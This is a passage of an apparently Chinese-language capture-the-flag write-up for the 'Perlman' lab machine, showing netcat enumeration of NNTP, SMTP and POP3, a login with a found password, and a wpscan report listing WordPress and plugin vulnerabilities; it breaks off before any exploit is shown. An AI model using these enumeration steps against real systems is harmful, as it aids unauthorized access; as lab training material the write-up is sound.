\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 995\n(UNKNOWN) [192.168.0.176] 995 (pop3s) open\nUSER webmaster<\/code><\/pre>\n\u76f4\u63a5\u5f39\u51fa\u6765\u4e86\uff0c\u6700\u540e\u770b\u4e00\u4e0b119<\/code>\u7aef\u53e3\uff1a<\/p>\n\n\u7f51\u7edc\u65b0\u95fb\u4f20\u8f93\u534f\u8bae<\/strong>( NNTP )<\/strong>\u662f\u4e00\u79cd\u5e94\u7528\u534f\u8bae)\uff0c\u7528\u4e8e\u5728\u65b0\u95fb\u670d\u52a1\u5668\u4e4b\u95f4\u4f20\u8f93Usenet\u65b0\u95fb\u6587\u7ae0 ( netnews<\/em> ) \uff0c\u4ee5\u53ca\u4f9b\u6700\u7ec8\u7528\u6237\u5ba2\u6237\u7aef\u5e94\u7528\u7a0b\u5e8f\u9605\u8bfb\/\u53d1\u5e03\u6587\u7ae0\u3002<\/p>\n<\/blockquote>\n<\/div><\/p>\n\u53ef\u4ee5\u53c2\u8003\uff1a<\/p>\n
https:\/\/0xffsec.com\/handbook\/services\/nntp\/<\/a><\/p>\nhttps:\/\/cheatsheet.haax.fr\/network\/services-enumeration\/119_nntp\/<\/a><\/p>\n\u8054\u60f3\u5230\uff1awebmaster@perlman.hmv<\/code><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 119\n(UNKNOWN) [192.168.0.176] 119 (nntp) open\n200 server.example.net InterNetNews NNRP server INN 2.6.4 ready (posting ok)\nLIST\n215 Newsgroups in form "group high low status"\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000003 y\n.\nHELP\n100 Legal commands\n ARTICLE [message-ID|number]\n AUTHINFO USER name|PASS password|SASL mechanism [initial-response]|GENERIC program [argument ...]\n BODY [message-ID|number]\n CAPABILITIES [keyword]\n COMPRESS DEFLATE\n DATE\n GROUP newsgroup\n HDR header [message-ID|range]\n HEAD [message-ID|number]\n HELP\n IHAVE message-ID\n LAST\n LIST [ACTIVE [wildmat]|ACTIVE.TIMES [wildmat]|COUNTS [wildmat]|DISTRIB.PATS|DISTRIBUTIONS|HEADERS [MSGID|RANGE]|MODERATORS|MOTD|NEWSGROUPS [wildmat]|OVERVIEW.FMT|SUBSCRIPTIONS [wildmat]]\n LISTGROUP [newsgroup [range]]\n MODE READER\n NEWGROUPS [yy]yymmdd hhmmss [GMT]\n NEWNEWS wildmat [yy]yymmdd hhmmss [GMT]\n NEXT\n OVER [range]\n POST\n QUIT\n STARTTLS\n STAT [message-ID|number]\n XGTITLE [wildmat]\n XHDR header [message-ID|range]\n XOVER [range]\n XPAT header message-ID|range pattern [pattern ...]\nReport problems to <usenet@perlman.hmv>.\n.\nGROUP\n501 Syntax is: GROUP newsgroup\nCAPABILITIES\n101 Capability list:\nVERSION 2\nIMPLEMENTATION INN 2.6.4\nAUTHINFO SASL\nCOMPRESS DEFLATE\nHDR\nLIST ACTIVE ACTIVE.TIMES COUNTS DISTRIB.PATS DISTRIBUTIONS HEADERS MODERATORS MOTD NEWSGROUPS OVERVIEW.FMT SUBSCRIPTIONS\nOVER\nPOST\nREADER\nSASL DIGEST-MD5 CRAM-MD5 NTLM\nSTARTTLS\nXPAT\n.\nSELECT perlman.hmv \n500 What?\nLIST\n215 Newsgroups in form "group high low status"\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000003 y\n.\nSELECT junk\n500 What?\nGROUP perlman.hmv\n211 0 3 2 perlman.hmv<\/code><\/pre>\n\u4f46\u662f\u6ca1\u6709\u6587\u7ae0\uff0c\u67e5\u770b\u4e00\u4e0b\u6587\u6863\uff1ahttps:\/\/www.ietf.org\/rfc\/rfc977.txt<\/a><\/p>\n<\/div><\/p>\nPOST\n340 Ok, recommended message-ID <v6ni8h$1bb$1@perlman.hmv><\/code><\/pre>\n\u5f97\u5230\u4fe1\u606f\uff01\u4f46\u662f\u67e5\u770bwp\uff0c\u53d1\u73b0\u9700\u8981\u5f97\u5230\u7684\u662f\u53e6\u4e00\u4e2a\u4fe1\u606f\uff0c\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff1a<\/p>\n
\n\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u56e0\u4e3a\u91cd\u65b0\u5bfc\u5165\u7684\u65f6\u5019\u9009\u62e9\u4e86\u4e3a\u6240\u6709\u7f51\u5361\u91cd\u65b0\u751f\u6210MAC\u5730\u5740\u3002<\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 119\n(UNKNOWN) [192.168.0.136] 119 (nntp) open\n200 server.example.net InterNetNews NNRP server INN 2.6.4 ready (posting ok)\nHELP\n100 Legal commands\n ARTICLE [message-ID|number]\n AUTHINFO USER name|PASS password|SASL mechanism [initial-response]|GENERIC program [argument ...]\n BODY [message-ID|number]\n CAPABILITIES [keyword]\n COMPRESS DEFLATE\n DATE\n GROUP newsgroup\n HDR header [message-ID|range]\n HEAD [message-ID|number]\n HELP\n IHAVE message-ID\n LAST\n LIST [ACTIVE [wildmat]|ACTIVE.TIMES [wildmat]|COUNTS [wildmat]|DISTRIB.PATS|DISTRIBUTIONS|HEADERS [MSGID|RANGE]|MODERATORS|MOTD|NEWSGROUPS [wildmat]|OVERVIEW.FMT|SUBSCRIPTIONS [wildmat]]\n LISTGROUP [newsgroup [range]]\n MODE READER\n NEWGROUPS [yy]yymmdd hhmmss [GMT]\n NEWNEWS wildmat [yy]yymmdd hhmmss [GMT]\n NEXT\n OVER [range]\n POST\n QUIT\n STARTTLS\n STAT [message-ID|number]\n XGTITLE [wildmat]\n XHDR header [message-ID|range]\n XOVER [range]\n XPAT header message-ID|range pattern [pattern ...]\nReport problems to <usenet@perlman.hmv>.\n.\nLIST\n215 Newsgroups in form "group high low status"\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000001 y\n.\nGROUP perlman.hmv\n211 1 1 2 perlman.hmv\nARTICLE 2\n220 2 <tfi784$403$1@perlman.hmv> article\nPath: server.example.net!.POSTED.192.168.0.27!not-for-mail\nFrom: rita <rita@perlman.hmv>\nNewsgroups: perlman.hmv\nSubject: Whats up ?!\nDate: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)\nOrganization: A poorly-installed InterNetNews site\nMessage-ID: <tfi784$403$1@perlman.hmv>\nMime-Version: 1.0\nContent-Type: text\/plain; charset=UTF-8\nContent-Transfer-Encoding: 8bit\nInjection-Date: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)\nInjection-Info: perlman.hmv; posting-host="192.168.0.27";\n logging-data="4099"; mail-complaints-to="usenet@perlman.hmv"\nUser-Agent: Pan\/0.151 (Butcha; a6f6327)\nXref: server.example.net perlman.hmv:2\n\nSo cool to have installed a newsgroup server! \nSee you soon kissss\n.<\/code><\/pre>\n\u5f97\u5230\u7528\u6237\u540d rita<\/code>\uff0c\u4ee5\u53ca\u90ae\u7bb1 rita@perlman.hmv<\/code>\u3002<\/p>\n\u91cd\u65b0\u8bbf\u95ee\u524d\u9762\u7684\u5176\u4ed6\u7aef\u53e3\uff1a<\/p>\n
https:\/\/cheatsheet.haax.fr\/network\/services-enumeration\/25_smtp\/<\/a><\/p>\nhttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-smtp#banner-grabbing-basic-connection<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 25\n(UNKNOWN) [192.168.0.136] 25 (smtp) open\n220 perlman.hmv ESMTP Postfix (Debian\/GNU)\nHELO perlman.hmv\n250 perlman.hmv\nVRFY rita\n252 2.0.0 rita\nMAIL FROM:rita@perlman.hmv\n250 2.1.0 Ok\nRCPT TO:hack@hack.com\n250 2.1.5 Ok\nDATA\n354 End data with <CR><LF>.<CR><LF>\n.\n250 2.0.0 Ok: queued as D6E85415F8\nquit\n221 2.0.0 Bye<\/code><\/pre>\n\u7136\u540e\u770b\u4e00\u4e0b\u90a3\u4e2a\u63a5\u90ae\u7bb1\u7684\u7aef\u53e3\uff1ahttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-pop#banner-grabbing<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 110\n(UNKNOWN) [192.168.0.136] 110 (pop3) open\n+OK Dovecot (Debian) ready.\nUSER rita\n+OK\nPASS cookie\n+OK Logged in.\nLIST\n+OK 1 messages:\n1 2390\n.\nRETR 1\n+OK 2390 octets\nReturn-Path: <>\nX-Original-To: rita@perlman.hmv\nDelivered-To: rita@perlman.hmv\nReceived: by perlman.hmv (Postfix)\n id 9C18441616; Thu, 11 Jul 2024 08:55:41 +0200 (CEST)\nDate: Thu, 11 Jul 2024 08:55:41 +0200 (CEST)\nFrom: MAILER-DAEMON@perlman.hmv (Mail Delivery System)\nSubject: Undelivered Mail Returned to Sender\nTo: rita@perlman.hmv\nAuto-Submitted: auto-replied\nMIME-Version: 1.0\nContent-Type: multipart\/report; report-type=delivery-status;\n boundary="D6E85415F8.1720680941\/perlman.hmv"\nContent-Transfer-Encoding: 8bit\nMessage-Id: <20240711065541.9C18441616@perlman.hmv>\n\nThis is a MIME-encapsulated message.\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Notification\nContent-Type: text\/plain; charset=utf-8\nContent-Transfer-Encoding: 8bit\n\n Charset: us-ascii\n From: MAILER-DAEMON (mailer@itzhak.perlman.hmv)\n Subject: Undelivered Mail Returned to Sender\n Postmaster-Subject: Postmaster Copy: Undelivered Mail\n\n This is the mail system at host perlman.hmv.\n\n I'm sorry to have to inform you that your message could not\n be delivered to one or more recipients. It's attached below.\n\n For further assistance, please send mail to postmaster.\n\n If you do so, please include this problem report. You can\n delete your own text from the attached returned message.\n\n The mail system\n EOF\n\n<hack@hack.com>: mail for hack.com loops back to myself\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Delivery report\nContent-Type: message\/delivery-status\n\nReporting-MTA: dns; perlman.hmv\nX-Postfix-Queue-ID: D6E85415F8\nX-Postfix-Sender: rfc822; rita@perlman.hmv\nArrival-Date: Thu, 11 Jul 2024 08:55:01 +0200 (CEST)\n\nFinal-Recipient: rfc822; hack@hack.com\nOriginal-Recipient: rfc822;hack@hack.com\nAction: failed\nStatus: 5.4.6\nDiagnostic-Code: X-Postfix; mail for hack.com loops back to myself\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Undelivered Message\nContent-Type: message\/rfc822\nContent-Transfer-Encoding: 8bit\n\nReturn-Path: <rita@perlman.hmv>\nReceived: from perlman.hmv (kali [192.168.0.143])\n by perlman.hmv (Postfix) with SMTP id D6E85415F8\n for <hack@hack.com>; Thu, 11 Jul 2024 08:55:01 +0200 (CEST)\n\n--D6E85415F8.1720680941\/perlman.hmv--\n.<\/code><\/pre>\nwordpress\u6d4b\u8bd5<\/h3>\n
\u627e\u5230\u4e00\u4e2a\u57df\u540d\uff1aitzhak.perlman.hmv<\/code><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ whatweb http:\/\/itzhak.perlman.hmv\nhttp:\/\/itzhak.perlman.hmv [200 OK] Apache[2.4.54], Bootstrap[6.0.2], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.54 (Debian)], IP[192.168.0.136], JQuery[3.6.0], MetaGenerator[WordPress 6.0.2], PoweredBy[--], Script, Title[Computer store ! – Just another WordPress site], UncommonHeaders[link], WordPress[6.0.2]<\/code><\/pre>\n\u53d1\u73b0\u662f\u4e00\u4e2awordpress<\/code>\u7ad9\u70b9\uff0c\u626b\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ wpscan --url http:\/\/itzhak.perlman.hmv --api-token XXXXX\n_______________________________________________________________\n __ _______ _____\n \\ \\ \/ \/ __ \\ \/ ____|\n \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae\n \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n \\ \/\\ \/ | | ____) | (__| (_| | | | |\n \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.25\n Sponsored by Automattic - https:\/\/automattic.com\/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/itzhak.perlman.hmv\/ [192.168.0.136]\n[+] Started: Thu Jul 11 03:58:38 2024\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.54 (Debian)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/itzhak.perlman.hmv\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n | - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/itzhak.perlman.hmv\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/itzhak.perlman.hmv\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/itzhak.perlman.hmv\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n | - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 6.0.2 identified (Insecure, released on 2022-08-30).\n | Found By: Rss Generator (Passive Detection)\n | - http:\/\/itzhak.perlman.hmv\/?feed=rss2, <generator>https:\/\/wordpress.org\/?v=6.0.2<\/generator>\n | - http:\/\/itzhak.perlman.hmv\/?feed=comments-rss2, <generator>https:\/\/wordpress.org\/?v=6.0.2<\/generator>\n |\n | [!] 30 vulnerabilities identified:\n |\n | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/713bdc8b-ab7c-46d7-9847-305344a579c4\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/abf236fdaf94455e7bc6e30980cf70401003e283\n |\n | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/926cd097-b36f-4d26-9c51-0dfab11c301b\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/506eee125953deb658307bb3005417cb83f32095\n |\n | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/c5675b59-4b1d-4f64-9876-068e05145431\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44\n |\n | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/cfd8b50d-16aa-4319-9c2d-b227365c2156\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/8836d4682264e8030067e07f2f953a0f66cb76cc\n |\n | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/b60a6557-ae78-465c-95bc-a78cf74a6dd0\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/a4f9ca17fae0b7d97ff807a3c234cf219810fae0\n |\n | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/2787684c-aaef-4171-95b4-ee5048c74218\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef\n |\n | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/02d76d8e-9558-41a5-bdb6-3957dc31563b\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/89c8f7919460c31c0f259453b4ffb63fde9fa955\n |\n | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/3f707e05-25f0-4566-88ed-d8d0aff3a872\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/3765886b4903b319764490d4ad5905bc5c310ef8\n |\n | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/1da03338-557f-4cb6-9a65-3379df4cce47\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/d815d2e8b2a7c2be6694b49276ba3eee5166c21f\n |\n | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/58d131f5-f376-4679-b604-2b888de71c5b\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/929cf3cb9580636f1ae3fe944b8faf8cca420492\n |\n | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms\/Tags Endpoint\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/b27a8711-a0c0-4996-bd6a-01734702913e\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/ebaac57a9ac0174485c65de3d32ea56de2330d8e\n |\n | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg\n | Fixed in: 6.0.3\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9\n | - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n | - https:\/\/github.com\/WordPress\/gutenberg\/pull\/45045\/files\n |\n | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/c8814e6e-78b3-4f63-a1d3-6906a84c1f11\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-3590\n | - https:\/\/blog.sonarsource.com\/wordpress-core-unauthenticated-blind-ssrf\/\n |\n | [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files\n | Fixed in: 6.0.4\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/2999613a-b8c8-4ec0-9164-5dfe63adf6e6\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-2745\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF\n | Fixed in: 6.0.4\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/a03d744a-9839-4167-a356-3e7da0f1d532\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery\n | Fixed in: 6.0.4\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/3b574451-2852-4789-bc19-d5cc39948db5\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data\n | Fixed in: 6.0.5\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/ef289d46-ea83-4fa5-b003-0352c690fd89\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-2-security-release\/\n |\n | [!] Title: WP < 6.2.1 - Contributor+ Content Injection\n | Fixed in: 6.0.4\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/1527ebdb-18bc-4f9d-9c20-8d729a628670\n | - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/cd130bb3-8d04-4375-a89a-883af131ed3a\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-38000\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/da1419cc-d821-42d6-b648-bdb3c70d91f2\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/6d80e09d-34d5-4fda-81cb-e703d0e56e4f\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/3615aea0-90aa-4f9a-9792-078a90af7f59\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-39999\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/19380917-4c27-4095-abf1-eba6f913b441\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-5561\n | - https:\/\/wpscan.com\/blog\/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2\/\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data\n | Fixed in: 6.0.7\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/5e9804e5-bbd4-4836-a5f0-b4388cc39225\n | - https:\/\/wordpress.org\/news\/2024\/01\/wordpress-6-4-3-maintenance-and-security-release\/\n |\n | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload\n | Fixed in: 6.0.7\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/a8e12fbe-c70b-4078-9015-cf57a05bdd4a\n | - https:\/\/wordpress.org\/news\/2024\/01\/wordpress-6-4-3-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS\n | Fixed in: 6.0.8\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/1a5c5df1-57ee-4190-a336-b0266962078f\n | - https:\/\/wordpress.org\/news\/2024\/04\/wordpress-6-5-2-maintenance-and-security-release\/\n |\n | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API\n | Fixed in: 6.0.9\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/2c63f136-4c1f-4093-9a8c-5e51f19eae28\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block\n | Fixed in: 6.0.9\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/7c448f6d-4531-4757-bff0-be9e3220bbbb\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block\n | Fixed in: 6.0.9\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/36232787-754a-4234-83d6-6ded5e80251c\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n\n[+] WordPress theme in use: twentytwentyone\n | Location: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/\n | Last Updated: 2024-04-02T00:00:00.000Z\n | Readme: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/readme.txt\n | [!] The version is out of date, the latest version is 2.2\n | Style URL: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/style.css?ver=1.6\n | Style Name: Twenty Twenty-One\n | Style URI: https:\/\/wordpress.org\/themes\/twentytwentyone\/\n | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.6 (80% confidence)\n | Found By: Style (Passive Detection)\n | - http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/style.css?ver=1.6, Match: 'Version: 1.6'\n\n[+] Enumerating All Plugins (via Passive Methods)\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] Plugin(s) Identified:\n\n[+] thecartpress\n | Location: http:\/\/itzhak.perlman.hmv\/wp-content\/plugins\/thecartpress\/\n | Latest Version: 1.5.3.6 (up to date)\n | Last Updated: 2017-01-12T19:25:00.000Z\n |\n | Found By: Urls In Homepage (Passive Detection)\n |\n | [!] 1 vulnerability identified:\n |\n | [!] Title: TheCartPress eCommerce Shopping Cart <= 1.5.3.6 - Unauthenticated Arbitrary Admin Account Creation\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/9b403259-0c84-4566-becd-eb531c486c21\n | - https:\/\/www.exploit-db.com\/exploits\/50378\/\n |\n | Version: 1.5.3.6 (80% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n | - http:\/\/itzhak.perlman.hmv\/wp-content\/plugins\/thecartpress\/readme.txt\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 <====================================================================> (137 \/ 137) 100.00% Time: 00:00:00\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 3\n | Requests Remaining: 19\n\n[+] Finished: Thu Jul 11 03:58:46 2024\n[+] Requests Done: 177\n[+] Cached Requests: 5\n[+] Data Sent: 52.722 KB\n[+] Data Received: 523.41 KB\n[+] Memory used: 272.953 MB\n[+] Elapsed time: 00:00:08<\/code><\/pre>\n\u5c1d\u8bd5\u641c\u7d22\u5229\u7528\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
\n\u7a81\u7136\u51fa\u73b0\u62a5\u9519\u4e86\uff1a<\/p>\n<\/blockquote>\n
